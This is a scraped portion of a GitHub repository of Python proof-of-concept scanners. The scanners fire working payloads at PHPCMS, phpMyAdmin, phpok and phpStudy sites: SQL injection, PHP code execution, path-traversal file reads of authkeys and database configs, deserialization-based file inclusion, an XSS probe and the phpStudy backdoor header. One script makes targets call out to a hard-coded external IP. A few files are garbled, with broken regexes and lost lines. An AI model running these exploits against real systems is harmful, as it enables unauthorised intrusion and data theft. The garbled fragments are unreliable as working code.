-------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpcms/__pycache__/phpcms_v9_flash_xss.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/phpcms_authkey_disclosure.py: 
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: phpcms authkey disclosure
referer: http://wooyun.org/bugs/wooyun-2015-0105242
author: Lucifer
description: PHPCMS authkey disclosure vulnerability, which can lead to SQL injection.
'''
import re
import sys
import requests
import warnings
from termcolor import cprint

class phpcms_authkey_disclosure_BaseVerify:
    """Check whether api.php?op=get_menu returns the site authkey.

    ``run()`` issues one GET and returns ``True`` when the response has
    status 200 and contains a 32-character word token, ``None`` otherwise.
    """

    def __init__(self, url: str) -> None:
        # Base URL of the target; run() appends the probe path verbatim.
        self.url = url

    def run(self):
        """Request the menu cache file via the cachefile parameter and grep for a 32-char token.

        The match is any run of 32 word characters anywhere in the body, so a
        page that merely contains some other 32-character token (a hash, a
        session id) is also reported as positive.
        """
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # Non-raw literal: only "\\applist" is an explicit backslash; the other
        # backslashes survive because Python keeps unknown escapes (with a
        # warning). A raw string would make the intended path unambiguous.
        payload = "/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\\applist&path=admin"
        vulnurl = self.url + payload
        try:
            # verify=False disables TLS certificate validation for this request.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # Non-raw pattern: "\w" is an invalid escape kept with a warning.
            m = re.search('(\w{32})',req.text)
            if req.status_code == 200 and m:
                cprint("[+]存在PHPCMS authkey泄露漏洞...(高危)\tpayload: "+vulnurl+"\tauthkey: "+m.group(1), "red")
                return True
            else:
                cprint("[-]不存在phpcms_authkey_disclosure漏洞", "white", "on_grey")

        # Bare except: network errors are printed as "possibly not vulnerable".
        except:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")

if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = phpcms_authkey_disclosure_BaseVerify(sys.argv[1])
    testVuln.run()
--------------------------------------------------------------------------------
/POC_Scan/cms/phpcms/phpcms_digg_add_sqli.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: phpcms digg_add.php SQL injection
referer: http://www.shangxueba.com/jingyan/2195152.html
author: Lucifer
description: In digg_add.php the digg_mod parameter is SQL-injectable.
'''
import sys
import requests
import warnings
from termcolor import cprint

class phpcms_digg_add_sqli_BaseVerify:
    """Error-based check for the digg_add.php digg_mod SQL injection.

    ``run()`` issues one GET and returns ``True`` when the full md5(1234)
    digest appears in the response, ``None`` otherwise.
    """

    def __init__(self, url: str) -> None:
        # Base URL of the target; run() appends the probe path verbatim.
        self.url = url

    def run(self):
        """Send the probe and look for the md5(1234) marker in the body."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/digg/digg_add.php?id=1&con=2&digg_mod=digg_data%20WHERE%201=2%20+and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x7e,md5(1234),0x7e)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23"
        vulnurl = self.url + payload
        try:
            # verify=False disables TLS certificate validation for this request.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                cprint("[+]存在PHPCMS digg_add.php SQL注入漏洞...(高危)\t\tpayload: "+vulnurl, "red")
                return True
            else:
                cprint("[-]不存在phpcms_digg_add_sqli漏洞", "white", "on_grey")

        # Bare except: network errors are printed as "possibly not vulnerable".
        except:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")

if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = phpcms_digg_add_sqli_BaseVerify(sys.argv[1])
    testVuln.run()

--------------------------------------------------------------------------------
/POC_Scan/cms/phpcms/phpcms_flash_upload_sqli.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: phpcms2008 flash_upload.php SQL injection
referer: unknown
author: Lucifer
description: In flash_upload.php the modelid parameter is SQL-injectable.
'''
import sys
import requests
import warnings
from termcolor import cprint

class phpcms_flash_upload_sqli_BaseVerify:
    """Error-based check for the phpcms2008 flash_upload.php modelid SQL injection.

    ``run()`` issues one GET whose modelid value is fully percent-encoded and
    returns ``True`` when the expected digest appears in the response,
    ``None`` otherwise.
    """

    def __init__(self, url: str) -> None:
        # Base URL of the target; run() appends the probe path verbatim.
        self.url = url

    def run(self):
        """Send the encoded probe and look for the marker digest in the body.

        The decoded query evaluates ``md5(3.1415)``; the literal compared below
        is presumably that digest (not verified here).
        """
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/flash_upload.php?modelid=%30%20%61%6E%64%28%73%65%6C%65%63%74%20%31%20%66%72%6F%6D%28%73%65%6C%65%63%74%20%63%6F%75%6E%74%28%2A%29%2C%63%6F%6E%63%61%74%28%28%73%65%6C%65%63%74%20%28%73%65%6C%65%63%74%20%28%73%65%6C%65%63%74%20%63%6F%6E%63%61%74%28%30%78%37%65%2C%6D%64%35%28%33%2E%31%34%31%35%29%2C%30%78%37%65%29%29%29%20%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%20%6C%69%6D%69%74%20%30%2C%31%29%2C%66%6C%6F%6F%72%28%72%61%6E%64%28%30%29%2A%32%29%29%78%20%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%20%67%72%6F%75%70%20%62%79%20%78%29%61%29"
        vulnurl = self.url + payload
        try:
            # verify=False disables TLS certificate validation for this request.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            if r"63e1f04640e83605c1d177544a5a0488" in req.text:
                cprint("[+]存在phpcms2008 flash_upload.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
                return True
            else:
                cprint("[-]不存在phpcms_flash_upload_sqli漏洞", "white", "on_grey")

        # Bare except: network errors are printed as "possibly not vulnerable".
        except:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")

if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = phpcms_flash_upload_sqli_BaseVerify(sys.argv[1])
    testVuln.run()
--------------------------------------------------------------------------------
/POC_Scan/cms/phpcms/phpcms_product_code_exec.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: phpcms2008 product.php code execution
referer: http://www.wooyun.org/bugs/WooYun-2011-02984
author: Lucifer
description: In product.php the pagesize parameter is code-injectable.
'''
import sys
import requests
import warnings
from termcolor import cprint

class phpcms_product_code_exec_BaseVerify:
    """Check whether /yp/product.php evaluates the pagesize parameter as PHP.

    The probe value calls ``phpinfo()``; ``run()`` returns ``True`` when the
    response contains a string that only a phpinfo() page carries
    ("Configuration File (php.ini) Path"), ``None`` otherwise.
    """

    def __init__(self, url: str) -> None:
        # Base URL of the target; run() appends the probe path verbatim.
        self.url = url

    def run(self):
        """Send the probe and look for the phpinfo() page marker in the body."""
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/yp/product.php?pagesize=${@phpinfo()}"
        vulnurl = self.url + payload
        try:
            # verify=False disables TLS certificate validation for this request.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            if r"Configuration File (php.ini) Path" in req.text:
                cprint("[+]存在phpcms2008 product.php 代码执行漏洞...(高危)\tpayload: "+vulnurl, "red")
                return True
            else:
                cprint("[-]不存在phpcms_product_code_exec漏洞", "white", "on_grey")

        # Bare except: network errors are printed as "possibly not vulnerable".
        except:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")

if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = phpcms_product_code_exec_BaseVerify(sys.argv[1])
    testVuln.run()
--------------------------------------------------------------------------------
/POC_Scan/cms/phpcms/phpcms_v961_fileread.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: phpcms 9.6.1 arbitrary file read vulnerability
referer: http://bobao.360.cn/learning/detail/3805.html
author: Lucifer
description: Arbitrary file read in the latest phpcms; see the referenced page for the root cause.
'''
import re
import sys
import requests
import warnings
from termcolor import cprint

class phpcms_v961_fileread_BaseVerify:
    """Four-step check for the phpcms 9.6.1 attachment download file read.

    Sequence as written: (1) GET the wap init page to obtain a cookie,
    (2) POST to swfupload_json with that cookie value as ``userid_flash`` to
    obtain a second cookie, (3) GET the content download page with that value
    as ``a_k`` and extract a link, (4) GET the link and inspect the body.
    ``run()`` returns ``True`` on a positive match, ``None`` otherwise.
    """

    def __init__(self, url: str) -> None:
        # Base URL of the target; every request path is appended to it verbatim.
        self.url = url

    def run(self):
        """Walk the cookie/attachment chain and test the final response."""
        headers = {
            "Content-Type":"application/x-www-form-urlencoded",
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # (sic) "preffix" — name kept as in the original.
        url_preffix = self.url + "/index.php?m=wap&c=index&a=init&siteid=1"
        siteid = ""
        att_json = ""
        try:
            # verify=False disables TLS certificate validation on every request below.
            req1 = requests.get(url_preffix, headers=headers, timeout=10, verify=False)
            # Takes the value of whichever cookie is iterated last, regardless
            # of its name; a target that sets several cookies may yield the wrong one.
            for cookie in req1.cookies:
                siteid = cookie.value
            payload = "/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&filename=test.jpg&src=%26i%3D3%26d%3D1%26t%3D9999999999%26catid%3D1%26ip%3D8.8.8.8%26m%3D3%26modelid%3D3%26s%3Dcaches%2fconfigs%2fsystem.p%26f%3Dh%25253Cp%26xxxx%3D"
            vulnurl = self.url + payload
            post_data = {
                "userid_flash":siteid
            }
            req2 = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
            # Same last-cookie-wins behaviour as above.
            for cookie in req2.cookies:
                att_json = cookie.value
            req3 = requests.get(self.url+"/index.php?m=content&c=down&a=init&a_k="+att_json, headers=headers, timeout=10, verify=False)
            # NOTE(review): as rendered the pattern has no capture group, so
            # .group(1) raises IndexError; the original most likely contained
            # HTML tag text that the page rendering stripped. Lines 43-50 of the
            # file (the result check) were lost the same way — see below.
            pattern = '.*?'
            link = re.search(pattern, req3.text).group(1)
            # No timeout on this request, unlike the three above.
            req4 = requests.get(self.url+"/index.php"+link, headers=headers, verify=False)
            if r"可能不存在漏洞", "cyan")

if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = phpcms_v961_fileread_BaseVerify(sys.argv[1])
    testVuln.run()

--------------------------------------------------------------------------------
/POC_Scan/cms/phpcms/phpcms_v96_sqli.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: phpcms v9.6.0 SQL injection
referer: https://zhuanlan.zhihu.com/p/26263513
author: Lucifer
description: Filter bypass caused by a sloppy filtering function.
'''
import sys
import requests
import warnings
from termcolor import cprint

class phpcms_v96_sqli_BaseVerify:
    def __init__(self, url):
        self.url = url

    def run(self):
        headers = {
            "Content-Type":"application/x-www-form-urlencoded",
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        url_prefix = self.url + "/index.php?m=wap&c=index&a=init&siteid=1"
        tmp_cookie = {}
        try:
            req = requests.get(url_prefix, headers=headers, timeout=10, verify=False)
            for cookie in req.cookies:
28 | tmp_cookie = cookie.value 29 | except: 30 | pass 31 | post_data = { 32 | "userid_flash":tmp_cookie 33 | } 34 | url_suffix = self.url + "/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27%20and%20updatexml%281%2Cconcat%281%2C%28user%28%29%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26" 35 | try: 36 | req2 = requests.post(url_suffix, data=post_data, headers=headers, timeout=10, verify=False) 37 | for cookie in req2.cookies: 38 | tmp_cookie = cookie.value 39 | except: 40 | pass 41 | 42 | vulnurl = self.url + "/index.php?m=content&c=down&a_k="+str(tmp_cookie) 43 | try: 44 | req3 = requests.get(vulnurl, headers=headers, timeout=10, verify=False) 45 | if r"XPATH syntax error" in req3.text: 46 | cprint("[+]存在phpcms v9.6.0 SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red") 47 | return True 48 | else: 49 | cprint("[-]不存在phpcms_v96_sqli漏洞", "white", "on_grey") 50 | 51 | except: 52 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") 53 | 54 | if __name__ == "__main__": 55 | warnings.filterwarnings("ignore") 56 | testVuln = phpcms_v96_sqli_BaseVerify(sys.argv[1]) 57 | testVuln.run() 58 | -------------------------------------------------------------------------------- /POC_Scan/cms/phpcms/phpcms_v9_flash_xss.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | ''' 4 | name: phpcms v9 flash xss漏洞 5 | referer: http://www.wooyun.org/bugs/wooyun-2014-079938 6 | author: Lucifer 7 | description: 文件player.swf中,存在xss漏洞。 8 | ''' 9 | import sys 10 | import urllib.request 11 | import hashlib 12 | import requests 13 | import warnings 14 | from termcolor import cprint 15 | 16 | class phpcms_v9_flash_xss_BaseVerify: 17 | def __init__(self, url): 18 | self.url = url 19 | 20 | def run(self): 21 | headers = { 22 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 23 | } 24 | flash_md5 
= "cf00b069e36e756705c49b3a3bf20c40" 25 | payload = "/statics/js/ckeditor/plugins/flashplayer/player/player.swf?skin=skin.swf&stream=\%22))}catch(e){alert(1)}//" 26 | vulnurl = self.url + payload 27 | try: 28 | req = urllib.request.urlopen(vulnurl) 29 | data = req.read() 30 | md5_value = hashlib.md5(data).hexdigest() 31 | if md5_value in flash_md5: 32 | cprint("[+]存在phpcms v9 flash xss漏洞...(高危)\tpayload: "+vulnurl, "red") 33 | return True 34 | else: 35 | cprint("[-]不存在phpcms_v9_flash_xss漏洞", "white", "on_grey") 36 | 37 | except: 38 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") 39 | 40 | if __name__ == "__main__": 41 | warnings.filterwarnings("ignore") 42 | testVuln = phpcms_v9_flash_xss_BaseVerify(sys.argv[1]) 43 | testVuln.run() -------------------------------------------------------------------------------- /POC_Scan/cms/phpmyadmin/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpmyadmin/__init__.py -------------------------------------------------------------------------------- /POC_Scan/cms/phpmyadmin/__pycache__/__init__.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpmyadmin/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpmyadmin/__pycache__/__init__.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpmyadmin/__pycache__/__init__.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpmyadmin/__pycache__/phpmyadmin_setup_lfi.cpython-37.pyc: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpmyadmin/__pycache__/phpmyadmin_setup_lfi.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpmyadmin/__pycache__/phpmyadmin_setup_lfi.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpmyadmin/__pycache__/phpmyadmin_setup_lfi.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpmyadmin/phpmyadmin_setup_lfi.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | ''' 4 | name: PhpMyAdmin2.8.0.3无需登录任意文件包含导致代码执行 5 | referer: http://www.mottoin.com/87915.html 6 | author: Lucifer 7 | description: 文件setup.php中,参数configuration经过序列化对象可导致文件包含漏洞。 8 | ''' 9 | import sys 10 | import json 11 | import requests 12 | import warnings 13 | from termcolor import cprint 14 | 15 | class phpmyadmin_setup_lfi_BaseVerify: 16 | def __init__(self, url): 17 | self.url = url 18 | 19 | def run(self): 20 | headers = { 21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 22 | } 23 | payload = "/scripts/setup.php" 24 | post_data ={ 25 | 'configuration':'O:10:"PMA_Config":1:{s:6:"source";s:11:"c:/boot.ini";}', 26 | 'action':'test' 27 | } 28 | vulnurl = self.url + payload 29 | try: 30 | req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False) 31 | if r"boot loader" in req.text: 32 | cprint("[+]存在PhpMyAdmin2.8.0.3无需登录任意文件包含导致代码执行漏洞(WINDOWS)...(高危)\tpayload: "+vulnurl+"\npost: "+json.dumps(post_data, indent=4), "red") 33 | return True 34 | 
else: 35 | cprint("[-]不存在phpmyadmin_setup_lfi漏洞", "white", "on_grey") 36 | 37 | except: 38 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") 39 | 40 | if __name__ == "__main__": 41 | warnings.filterwarnings("ignore") 42 | testVuln = phpmyadmin_setup_lfi_BaseVerify(sys.argv[1]) 43 | testVuln.run() -------------------------------------------------------------------------------- /POC_Scan/cms/phpok/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpok/__init__.py -------------------------------------------------------------------------------- /POC_Scan/cms/phpok/__pycache__/__init__.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpok/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpok/__pycache__/__init__.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpok/__pycache__/__init__.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpok/__pycache__/phpok_api_param_sqli.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpok/__pycache__/phpok_api_param_sqli.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpok/__pycache__/phpok_api_param_sqli.cpython-38.pyc: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpok/__pycache__/phpok_api_param_sqli.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpok/__pycache__/phpok_remote_image_getshell.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpok/__pycache__/phpok_remote_image_getshell.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpok/__pycache__/phpok_remote_image_getshell.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpok/__pycache__/phpok_remote_image_getshell.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpok/__pycache__/phpok_res_action_control_filedownload.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpok/__pycache__/phpok_res_action_control_filedownload.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpok/__pycache__/phpok_res_action_control_filedownload.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpok/__pycache__/phpok_res_action_control_filedownload.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpok/phpok_api_param_sqli.py: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | ''' 4 | name: phpok api.php SQL注入漏洞 5 | referer: http://www.moonsec.com/post-677.html 6 | author: Lucifer 7 | description: api_control文件存在SQL注入。 8 | ''' 9 | import sys 10 | import requests 11 | import warnings 12 | from termcolor import cprint 13 | 14 | class phpok_api_param_sqli_BaseVerify: 15 | def __init__(self, url): 16 | self.url = url 17 | 18 | def run(self): 19 | headers = { 20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 21 | } 22 | payload = "/api.php?c=api&f=phpok&id=_total¶m[pid]=42¶m[user_id]=0)UnIOn/**/sElEcT/**/mD5(1234)/**/LIMIT/**/1,1%23" 23 | vulnurl = self.url + payload 24 | try: 25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False) 26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text: 27 | cprint("[+]存在phpok api.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red") 28 | return True 29 | else: 30 | cprint("[-]不存在phpok_api_param_sqli漏洞", "white", "on_grey") 31 | 32 | except: 33 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") 34 | 35 | if __name__ == "__main__": 36 | warnings.filterwarnings("ignore") 37 | testVuln = phpok_api_param_sqli_BaseVerify(sys.argv[1]) 38 | testVuln.run() -------------------------------------------------------------------------------- /POC_Scan/cms/phpok/phpok_remote_image_getshell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | ''' 4 | name: phpok remote_image getshell漏洞 5 | referer: http://0day5.com/archives/1820/ 6 | author: Lucifer 7 | description: remote_image_f函数没对远程文件后缀做检查直接保存到本地。 8 | ''' 9 | import sys 10 | import time 11 | import hashlib 12 | import datetime 13 | import requests 14 | import warnings 15 | from termcolor import cprint 16 | 17 | class 
phpok_remote_image_getshell_BaseVerify: 18 | def __init__(self, url): 19 | self.url = url 20 | 21 | def run(self): 22 | headers = { 23 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 24 | } 25 | time_stamp = time.mktime(datetime.datetime.now().timetuple()) 26 | m = hashlib.md5(str(time_stamp).encode(encoding='utf-8')) 27 | md5_str = m.hexdigest() 28 | payload = "/index.php?c=ueditor&f=remote_image&upfile=http://45.76.158.91:6868/" + md5_str 29 | vulnurl = self.url + payload 30 | try: 31 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False) 32 | eye_url = "http://45.76.158.91/web.log" 33 | time.sleep(6) 34 | reqr = requests.get(eye_url, headers=headers, timeout=10, verify=False) 35 | if md5_str in reqr.text: 36 | cprint("[+]存在phpok remote_image getshell漏洞...(高危)\tpayload: "+vulnurl, "red") 37 | return True 38 | else: 39 | cprint("[-]不存在phpok_remote_image_getshell漏洞", "white", "on_grey") 40 | 41 | except: 42 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan") 43 | 44 | if __name__ == "__main__": 45 | warnings.filterwarnings("ignore") 46 | testVuln = phpok_remote_image_getshell_BaseVerify(sys.argv[1]) 47 | testVuln.run() 48 | -------------------------------------------------------------------------------- /POC_Scan/cms/phpok/phpok_res_action_control_filedownload.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | ''' 4 | name: phpok res_action_control.php 任意文件下载(需要cookies文件) 5 | referer: unknown 6 | author: Lucifer 7 | description: 参数file未经过滤进入到下载方法导致任意文件下载。 8 | ''' 9 | import sys 10 | import json 11 | import requests 12 | import warnings 13 | from termcolor import cprint 14 | 15 | class phpok_res_action_control_filedownload_BaseVerify: 16 | def __init__(self, url): 17 | self.url = url 18 | 19 | def run(self): 20 | headers = { 21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; 
Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 22 | } 23 | payload = "/admin.php?c=res_action&f=download&file=_config/db.ini.php" 24 | vulnurl = self.url + payload 25 | try: 26 | f = open(r'cookies.txt', 'r') 27 | cookies = {} 28 | for line in f.read().split(";"): 29 | name, value = line.strip().split("=",1) 30 | cookies[name]=value 31 | except: 32 | pass 33 | try: 34 | req = requests.get(vulnurl, headers=headers, cookies=cookies, timeout=10, verify=False) 35 | if r"可能不存在漏洞", "cyan") 43 | 44 | if __name__ == "__main__": 45 | warnings.filterwarnings("ignore") 46 | testVuln = phpok_res_action_control_filedownload_BaseVerify(sys.argv[1]) 47 | testVuln.run() -------------------------------------------------------------------------------- /POC_Scan/cms/phpstudy/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpstudy/__init__.py -------------------------------------------------------------------------------- /POC_Scan/cms/phpstudy/__pycache__/__init__.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpstudy/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpstudy/__pycache__/__init__.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpstudy/__pycache__/__init__.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpstudy/__pycache__/phpstudy_backdoor.cpython-37.pyc: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpstudy/__pycache__/phpstudy_backdoor.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpstudy/__pycache__/phpstudy_backdoor.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpstudy/__pycache__/phpstudy_backdoor.cpython-38.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpstudy/__pycache__/phpstudy_phpmyadmin_defaultpwd.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpstudy/__pycache__/phpstudy_phpmyadmin_defaultpwd.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpstudy/__pycache__/phpstudy_probe.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/cms/phpstudy/__pycache__/phpstudy_probe.cpython-37.pyc -------------------------------------------------------------------------------- /POC_Scan/cms/phpstudy/phpstudy_backdoor.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from termcolor import cprint 3 | 4 | class phpstudy_backdoor_BaseVerify(): 5 | def __init__(self,url): 6 | self.url = url 7 | 8 | def run(self): 9 | poc = { 10 | "Accept-Charset": "cGhwaW5mbygpOw==", 11 | "Accept-Encoding": "gzip,deflate" 12 | } 13 | try: 14 | pocRequest = requests.get(self.url, headers=poc,timeout=3) 15 | if 
